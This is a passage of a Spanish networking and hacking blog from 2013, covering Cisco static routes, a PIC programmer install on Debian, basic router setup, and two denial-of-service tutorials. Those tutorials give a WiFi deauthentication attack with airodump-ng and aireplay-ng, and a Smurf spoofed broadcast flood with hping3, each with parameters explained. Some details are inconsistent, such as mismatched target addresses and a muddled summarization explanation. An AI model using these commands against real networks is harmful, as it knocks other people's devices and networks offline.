para poder dar una mejor explicacion de la ruta estatica mostrare un ejemplo en base a un problema de redes.

tenemos la red 192.168.10.0 a la cual le crearemos 3 redes

  • una de 64 host
  • otra de 32 host
  • y la ultima de 2 host que es la que conectan las dos redes.
y queremos que estas redes se comuniquen una con otra, resuelve el problema.

ok sabiendo esto nos tocaria subnetear bajo VLSM la red dando como resultado esto.

Nota: si no sabes subnetear por VLSM dejame un comentario y si se juntan varias personas hare una entrada explicando el subneteo en VLSM.


HostDireccion de RedPrimera IPUltima IPDireccion de BroadcastMascara de Red
64192.168.10.0192.168.10.1192.168.10.126192.168.10.127255.255.255.128
32192.168.10.128192.168.10.129192.168.10.158192.168.10.159255.255.255.192
2192.168.10.160192.168.10.161192.168.10.162192.168.10.163255.255.255.252

una vez teniendo el subneteo es hora de configurar las ips en sus respectivas interfaces, esto no lo explicare ya que en la anterior entrada se explico como se realiza, asi que procedere a realizar las rutas estaticas.


ahora nuestro objetivo es comunicar la red 192.168.10.0 con la red 192.168.10.128, para eso utilizamos las rutas estaticas

el routerA tiene la ip 192.168.10.1 en su FastEthernet0/0 y en su interface Serial0/0/0 tiene la ip 192.168.10.161

el routerB tiene la ip 192.168.10.129 en su FastEthernet0/0 y en su interface Serial0/0/0 tiene la ip 192.168.10.162


asi que para comunicar routerA con routerB seria de esta forma.

RouterA(config)#ip route 192.168.10.128 255.255.255.192 192.168.10.162

ip route -> este comando es el que utilizamos para crear una ruta estatica.

192.168.10.128 -> en nuestro ejercicio esta ip representa la direccion de red de la re a la que queremos alcanzar

255.255.255.192 -> en nuestro ejercicio esta es la mascara de red que corresponde a nuestra direccion de red que queremos alcanzar

192.168.10.162 -> en nuestro ejercicio esta es la direccion del siguiente salto a la cual todo el trafico se dirigira en busca de la red que queremos alcanzar.

de igual manera el anterior valor puede ser sustituido por la interface de red como se muestra a bajo

RouterA(config)#ip route 192.168.10.128 255.255.255.192 Serial0/0/0

ahora realizaremos lo mismo de regreso .

RouterB(config)#ip route 192.168.10.0 255.255.255.128 192.168.10.161

ip route -> este comando es el que utilizamos para crear una ruta estatica.

192.168.10.0 -> en nuestro ejercicio esta ip representa la direccion de red de la re a la que queremos alcanzar

255.255.255.128 -> en nuestro ejercicio esta es la mascara de red que corresponde a nuestra direccion de red que queremos alcanzar

192.168.10.161 -> en nuestro ejercicio esta es la direccion del siguiente salto a la cual todo el trafico se dirigira en busca de la red que queremos alcanzar.

de esta forma se realiza la comunicacion por rutas estaticas.


Ruta por Defecto

las rutas por defecto son empleadas mayormente para ser como salida a internet ya que todo trafico que no se encuentre en la tabla de enrutamiento sera enviada hacia esa ruta.


ejemplo de rutapor defecto

Router(config)#ip route 0.0.0.0 0.0.0.0 Serial0/0/1

como podemos ver es similar a la ruta estatica solo que a diferencia de esta, aqui se indica que toda red sera enviada a la interface Serial0/0/1 que seria el enlace a Internet.


Ruta Estatica Sumarizada

la sumarizacion es empleada para resumir muchas direcciones de red en una sola lo cual nos ahorra mucho trabajo al momento de configurar rutas estaticas,

ahora veremos como se implementa mediante un ejercicio de redes.

supongamos que tenemos las redes
  • 192.168.1.0
  • 192.168.2.0
  • 192.168.3.0
realize la sumarizacion de esas redes y cree su ruta sumarizada para el RouterA.


primero que nada para realizar este ejercicio necesitamos convertir estas rutas en sus equivalentes en binario lo cual se veria de esta forma.

a claro se debe saber un poco de conversion de decimal a binario.

192.168.1.011000000.10101000.00000001.00000000
192.168.2.011000000.10101000.00000010.00000000
192.168.3.011000000.10101000.00000011.00000000

como podemos ver se crearon 4 octetos correspondientes a los segmentos de la direccion ip

para poder sumarizar, esto se realiza mediante una operacion AND en algebra booleana de Falso, Verdadero.

para ser mas claros cuando el valor en binario es uno se representa en electronica como el cierre de un circuito y cuando esta en cero se podria decir que el circuito esta abierto lo que vendria siendo un Falso

entonces empecemos a realizar la sumarizacion la primera hilera nos dice

1,0,1 que vendria siendo Verdadero, Falso, Verdadero, que da como resultado Falso, asi que seguimos hasta que de Verdadero

la siguiente hilera nos da.

0,1,1 que vendria siendo  Falso, Verdadero, Verdadero, que da como resultado Falso asi que continuemos

la siguiente hilera nos da.

0,0,0  que da Falso pero como aqui termina en donde se diferencian las direcciones de Red de aui partiremos para sacar la mascara de red dando como resultado la mascara

255.255.252.0


y como direccion de red para esta mascara de red sumarizada 192.168.0.0 ya que hasta la 4ta hilera que es 1,1,1 da como resultado Verdadero y el valor en decimal de ese segmento es 168 entonces quedaria como direccion de red la 192.168.0.0


ahora ya sabiendo todo esto es hora de crear la ruta estatica sumarizada

RouterA(config)#ip route 192.168.0.0 255.255.252.0 Serial0/0/0

y de esa forma hemos sumarizado 3 direcciones de red en una sola direccion de red y con esto concluyo esta entrada


Saludos.

martes, 28 de mayo de 2013

Master PROG en Debian Gnu/Linux


en esta ocaciones me saldre un poco del tema de la electronica para enseniarles como instalar el programador Master Prog, dejare una imagen a bajo para el que no lo conozca.




Master Prog es muy famoso en mercadolibre ya que es un programador clon del famoso programador de microchip, empresa creadora de los PIC.

para ser mas exactos Master Prog es un generico del conocido pickit2 el programador de microchip, desafortunadamente al comprar nuestro programador Master Prog, dicho programador solo es soportado en plataforma Windows, pero gracias a que es un generico del programador pickit2, podemos usar el controlador para GNU/Linux de pickit2 solo haciendo unas sencillas modificaciones, las cuales explicare en seguida :P

primero necesitamos instalar dependencias necesarias

(jopc)# apt-get install libusb++-dev make g++

luego descargamos el controlador, lo podemos hacer desde aqui:

Controlador


seguidamente procedemos a ir a la carpeta donde se descargo y procedemos a descomprimir

(jopc)#cd /home/jopc/Descargas/
(jopc)#tar -zxvf pk2*

una vez que ya lo hemos descomprimido procedemos a la compilacion e instalacion del controlador




(jopc)cd pk2*
(jopc)#make linux
(jopc)#make install

ahora solo nos queda copiar el archivo PK2DeviceFile.dat que se ha generado a esta direccion /usr/local/bin

(jopc)#cp PK2DeviceFile.dat /usr/local/bin

una vez hecho todo esto conectamos nuestro programador Master Prog  y ejecutamos el siguiente comando

(jopc)#pk2cmd -?v

lo cual si todo resulta bien lanzara algo parecido a esto


 


en dado caso que les lanze un no found como a mi me ocurrio igual explicare como reparar ese error.


dicho error se debe a que el ID que tiene por defecto el driver es el 04d8 el cual no es el mismo en el master prog, en mi caso el ID era el 1234 pero para saber exactamente cual es el verdadero ID de su Master Prog, usaremos el siguiente comando



(jopc)#lsusb

este comando nos lanzara como resultado algo parecido a esto.

Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 017: ID 1234:0033 Brain Actuated Technologies
Bus 001 Device 003: ID 0bda:58c0 Realtek Semiconductor Corp.


y como pueden ver el ID es el 1234, una vez sabiendo esto borraremos todos loc ocmpilados que hicimos con este comando, pero antes tenemos que acceder de nuevo a la carpeta que descomprimimos

#cd /home/jopc/Descargas/pk2*
#make clean

ahora procedemos a cambiar el valor 0x04d8 por 0x1234 en estos dos archivos, podemos usar nuestro editor de texto favorito, a mi se me hace mas practico usar nano y usar control+w para hacer busquedas dentro del documento .cpp


usbhidioc.cpp
pk2usb.cpp


una vez modificados, es hora de volver a compilar e instalar al igual de copiar el archivo que se genera de esta forma.

(jopc)#make linux
(jopc)#make install
(jopc)#cp PK2DeviceFile.dat /usr/local/bin

ahora volvemos a probar el comando anterior

(jopc)#pk2cmd -?v

y nos dira que todo a salido satisfactoria mente  :)

de esa manera tenemos nuestro master prog instalado en nuestro Debian Gnu/Linux




lunes, 27 de mayo de 2013

Denegando los servicios en las Redes WIFI


Hoy es Lunes y me toca explicar algo sobre hacking, asi que manos a la obra, siguiendo con el hilo de las denegaciones de servicio, hoy les tengo, como denegar servicios en redes wifi tanto al AP (Access Point) como algun cliente de la red.


ok, antes de empezar, como siempre digo, no me hago responsable de lo que sea aprendido en esta entrada, asi que dejare nuevamente el mensaje.


Advertencia: el autor de este documento no se hace responsable de lo que el lector haga con el material, toda responsabilidad caera en manos del perpretador.

una vez que hayan entendido de que no me hago responsable si los encarcelan, continuemos.


para realizar una denegacion de servicio en redes wifi es algo sencillo solo necesitamos una tarjeta wifi con modo promiscuo o modo monitor como le quieran decir y una distribucion de gnu/linux para realizar esta proeza

ok ya sabiendo que necesitamos todo esto, en dado caso de que no tengas una tarjeta en modo monitor, puedes comprarte una en mercadolibre :P claro si es que te interesa.


D.O.S. al Punto de Acceso


afirmo que no necesitamos estar en a red del AP para poder realizar este ataque, ok empezemos.

para iniciar necesitamos saber en que canal esta funcionando el AP que Dosearemos, asi que usaremos este comando:

(jopc)#iwlist wlan0 scan

el anterior comando nos mostrara una lista con todas las redes wifi encontradas por nuestra tarjeta inalambrica, entre todo ese texto escogeremos una red que nos guste y copiaremos el numero de canal como en el ejemplo de abajo.

Ejemplo:

(jopc)#iwlist wlan0 scan

          Cell 01 - Address: E0:1D:3B:54:CA:F0
                    Channel:4
                    Frequency:2.427 GHz (Channel 4)
                    Quality=25/70  Signal level=-85 dBm 
                    Encryption key:on
                    ESSID:"XXXXX"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=00000003e4e3546f
                    Extra: Last beacon: 4ms ago
                    IE: Unknown: 000D494E46494E4954554D43373930
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030104
                    IE: Unknown: 0706555320010B1B
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101870003A4000027A4000042435E0062322F00
                    IE: Unknown: DD1E00904C33CC111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 2D1ACC111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: DD1A00904C3404080800000000000000000000000000000000000000
                    IE: Unknown: 3D1604080800000000000000000000000000000000000000
                    IE: Unknown: 4A0E14000A002C01C800140005001900
                    IE: Unknown: 7F0101
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD0A00037F04010000004000
                    IE: Unknown: DD860050F204104A0001101044000102103B0001031047001000000000000010000000E01D3B54CAF0102100034349471023000F4349472047504F4E204F4E542052471024000B43494730303030303030311042000831323334353637381054000800060050F20400011011000F4349472047504F4E204F4E54205247100800020082103C000103



como pudimos observar la red XXXXX, esta trabajando en el canal 4 y su direccion mac es E0:1D:3B:54:CA:F0 esta es toda la informacion que necesitamos para realizar una D.O.S. en la red wifi

ahora pocederemos a activar el modo monitor de nuestra tarjeta


(jopc)# airmon-ng start wlan0

esto nos creara una nueva interfaz de red llamada mon0 que sera la que utilizaremos para hacer la Denegacion.

ahora colocaremos nuestra tarjeta a monitorear la red XXXXX

(jopc)# airodump-ng -c 4 mon0

-c  parametro de airodump-ng para definir el canal de la victima

mon0  la interfaz en modo monitor

una vez que esta monitoreando la red es hora de lanzar el ataque, asi que abrimos otra terminal y tecleamos lo siguiente.

(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 mon0

-0 parametro que indica ataque de desautenticacion

0  tiempo de espera entre cada envio de desautenticacion

-a  direccion mac del Punto de acceso (AP).

mon0  interfaz de red



D.O.S. a clientes conectados al AP

este metodo es sencillo, solo explicare el comando final por que no viene al caso explicar mas ya que el proceso es igual a este.

Ejemplo:


(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 -c 00:11:22:33:44:55 mon0

-c parametro que indica la direccion mac de el cliente victima

00:11:22:33:44:55   direccion mac del cliente victima

bueno eso es todo por hoy un pequeño manual de como realizar denegacion de servicio en redes wifi, las direcciones mac de los clientes de la red lo pueden ver con el comando anteriormente mensiondo "airodump-ng -c 4 mon0"
ahi aparecen las direcciones mac de los equipos asociados a la red.

y de nuevo me despido y espero no hagan travesuras con esto :P


Saludos.

lunes, 20 de mayo de 2013

Ataque Smurf, saturando las redes LAN desprotegidas


Bueno, como se los prometi cada lunes explicare algo sobre hacking, la semana pasada fue sobre nmap y como usarlo, ahora enseniare algo que por mi parecer no deberia enseniar, asi que antes de enseniarlo pondre una advertencia.

ADVERTENCIA: la informacion que sera mostrada a continuacion es peligrosa, el autor es decir yo no me hago responsable de lo que el lector haga con esta informacion, toda responsabilidad caera en manos del perpretador.

ya una vez aclarado eso, de que yo no me hago responsable de lo que hagan, podemos seguir :)

a claro que  esto solo lo ensenio como fines educativos no para molestar al progimo.


Ataque Smurf


el ataque smurf es un ataque de denegacion de servicio que se encarga de crear una tormenta de broadcast con ip de origen spoofeada, es decir realizamos peticiones ICMP a la direccion de broadcast en donde en el encabezado de ICMP nuestra ip de origen es falsa,

como ya debemos saber el broadcast en las redes produce que al enviar un paquete a esta direccion el mensaje se reenvie a todos los equipos en la red, entonces ¿que pasaria si la ip de origen no existiera? pues se crearia algo parecido a una tormenta de paquetes en la red, para entender mejor esto dare un ejemplo de como realizar un una tormenta de broadcast pero sin ip spoofeada, solo cuando la ip es spoofeada se conviente en ataque smurf.

los ejemplos seran explicados paso a paso, primero se mostrara un ejemplo y seguidamente cada parametro que lo compone.

Ejemeplo

(jopc)$su
(jop)#ping -b -f -s1472 192.168.0.255

ping    como ya lo habras de saber envia paquetes ICMP a la ip objetivo

-b  parametro que permite enviar paquetes a la ip de broadcast, obligatoria mente debes tener permisos de root para usarlo

-f  paramentro que permite realizar flood, es decir enva paquetes ICMP sin esperar la respuesta del ping

-s  parametro que indica el tamanio del paquete ICMP a enviar

1472   es el tamanio del paquete optimo para el envio de paquetes al broadcast es mejor dejarlo con ese tamanio cuando atacamos al broadcast


192.168.0.255   la ip de broadcast, esta puede ser cambiada por la ip de broadcast perteneciente a la red que vayamos a testear


como podemos observar esta instruccion es similar al famoso ping de la muerte de la epoca del win95 pero a diferencia de este, este envia ping al broadcast saturando la red, la desventaja de este ataque es que el atacante igual se queda colgado al igual que los atacados, de ahi que sea mejor el ataque smurf, ahora veremos un ejemplo del ataque smurf, pero antes explicare que fue el ping de la muerte :) 

El Famoso Ping de la Muerte




el ping de la muerte se hizo muy popular en el anio 96 y 97 cuando el windows 95 dictaba en los ordenadores corporativos e institucionales, en si el ping de la muerte se basa en enviar paquetes muy pesados a la ip destino mas bien paquetes de 65535bytes, en ese tiempo los paquetes ICMP eran libres no tenian un limitante de cantidad de paquetes que podrian permitir y cuales no, y como la velocidad de procesamiento en esa epoca era muy limitada producia colapsos en el sistema lo cual tiraba las maquinas atacadas, despues de un tiempo al descubrir el funcionamiento de los ataques crearon parches que permiten limitar el tamanio de los paquetes ICMP con lo que paquetes de mayor tamanio o iguales a 65535bytes son bloqueados y paquetes normales de 32bytes o un poco superior son permitidos.


Practica Ataque Smurf ya de una breve explicacion de que es smurf, que es tormenta de broadcast y como producirla, le toca al ataque smur hacer su aparicion, aclaro no me hago responsable.

bueno lo que usaremos en esta ocaciones el programa que se llama hping3 lo puedes instalar pero si usan un sistema de testing de seguridad ya vendra incluido.


bueno manos a la obra.

(jopc)#hping3 --spoof 192.168.0.10 --flood 192.168.10.255

ahora explicare cada paramentro
hping3  es una aplicacion que permite jugar con el los paquetes ping a demas de realizar otras funciones interesante.

--spoof  este paramentro le indica a hping3 que la ip de origen de los paquetes que envie contendran una ip que sera asignada en este caso vendria siendo la ip "192.168.0.10" esta ip puede ser inventada o puede ser el de algun equipo en la red

--flood  este paramentro le indica a hping3 que reaizara flood a la direccion indicada en este caso sera la ip de broadcast "192.168.0.255"


y de esa forma concluye esta entrada, recuerden no hagan travesuras con estos conocimientos, por que les podria ir mal xD es enserio si los meten al bote por esto, es que fue culpa suya, no mia.

Saludos.

viernes, 17 de mayo de 2013

Configuracion Basica de Router Cisco


Introducción

Bueno se que esto debí haberlo publicado ayer, pero por falta de tiempo, producto de tareas que aun no he concluido, no pude publicarlo, y que es peor ya se me amontono por que debo la entrada que va enfocado a la electrónica.

Empecemos


Bueno ya al grano, antes de entrar al tema de la configuracion basica de cisco hay que saber algo sumamente importante de los equipos cisco, tanto sea router como switch y esto es que tienen modulos o estados de acceso, estos estados los mencionare a bajo.



  • Modo Exec Usuario: este modo solo permite ver solo informacion superficial del router o switch mas bien informacion limitada, no permite realizar modificaciones y puede ser representado con el signo ">"
  • Modo Exec Privilegiado: este modo permite ver en detalle la configuracion del router o switch, ademas de ello da la posibilidad de hacer pruebas de diagnostico, este estado se puede diferenciar por el signo "#"
  • Modo Exec de Configuracion Global: este modo permite hacer configuraciones basicas en el equipo de red, ademas de que permite el acceso a submodulos para realizar configuraciones especificas, se puede identificar este modo mediante este signo "(config)#".


ahora ya sabiendo esto tenemos una idea de los tipos de permisos y accesos al sistema de los equipos de red cisco, bueno, es hora de comenzar con la configuracion basica, el procedimiento de aprendizaje es sencillo colocare configuracion y seguidamente explicare que es lo que estoy haciendo para que puedan entenderlo.


router>
router>enable
router#configure terminal
router(config)#

como pueden apreciar he accedido por los modos de acceso que he mencionado anteriormente.

enable el comando enable nos permite acceder al "Modo Exec Privilegiado".

configure terminal este comando nos permite acceder al "Modo Exec de Configuracion Global"

ya sabiendo los comandos mas importantes es hora de explicar especificamente cada comando

router(config)#hostname JOPC
JOPC(config)#


hostname    el comando hostname seguido de un paramentro que vendria siendo el nuevo nombre del dispositivo de red nos da como resultado la reasignacion de un nuevo nombre al dispositivo de red, como en en el ejemplo, el nombre asignado fue "JOPC".


router(config)# enable secret 12345

enable secret  el comando enable secret seguido de un parametro que vendria siendo la contraseña asignar al "Modo Exec Privilegiado", como ya dije sirve para asignarle una contraseña al "Modo Exec Privilegiado"

router(config)#line con 0
router(config-line)#password 12345
router(config-line)#login
router(config-line)#exit
router(config)#

line con  el comando line con seguido del parametro 0 le indica a la instruccion que accederemos a la interfaz de consola 0

password el comando password seguido del parametro 12345 le indica a la instruccion que configurara la contraseña con el parametro 12345

login el comando login  habilita la contraseña configurada anteriormente

exit  el comando exit nos saca del submodo line y nos regresa al modo exec global  

line  el comando line ademas de soportal el modo consola igual soporta otros como es el vty el cual permite usar el servicio telnet para acceder al dispositovo de red, al agregarle el rango de usuario a acceder que vendrian siendo de 0 a 4 tendriamos 5 lineas de acceso por telnet, a bajo colocare un ejemplo de como configurar telnet.

router(config)#line vty 0 4
router(config-line)#password 12345
router(config-line)#login
router(config-line)#exit
router(config)#

 Configurando interfaces de red

ahora es momento de explicar como configurar interfaces de red pues empecemos

router(config)# interface f0/0
router(config-if)#ip address 192.168.0.1 255.255.255.0
router(config-if)#no shutdown
router(config-if)#description  RED
router(config-if)#exit

router(config)#


interface f0/0  el comando interface f0/0 nos permite acceder la la interfaz fisica FastEthernet0/0

ip address el comando ip address configura con una ip del rango de ips y una mascara de red la interfaz f0/0

no shutdown  el comando no shutdown levanta la interfaz  para que se agregue a la tabla de enrutamiento.

description el comando description seguido de un parametro de cadena nos permite etiquetar la interfaz con alguna descripcion para saber que funcion tiene dicha interfaz.


El procedimiento de configuracion de la interfaces seriales es similar y solo se diferencia un poco por el uso del comando clock rate, dicho comando solo le da la velocidad de reloj entre el DCE  (hembra) DTE (Macho), la interfaz serial con DCE es el unico que debe llevar el comando clock rate, ahora se mostrara un ejemplo de la configuracion de cada uno, los comandos no se explicaran ya que no tiene caso repetir los mismo comandos usados en la configuracion de interfaces FastEthernet.

DCE

router(config)# interface serial 0/1
router(config-if)# ip address 10.0.0.1 255.255.255.252
router(config-if)# clock rate 56000 
router(config-if)# no shutdown 
router(config-if)# description RED 
router(config-if)# exit 
router(config)#

 
DTE

router(config)# interface serial 0/1
router(config-if)# ip address 10.0.0.2 255.255.255.252
router(config-if)# no shutdown 
router(config-if)# description RED 
router(config-if)# exit 
router(config)#
bueno con eso acaba esta parte de configuracion basica en routers cisco, no se vieron algunos comandos por lo fugas que fue esta entrada, pero a futuro tal vez sean publicados


Saludos.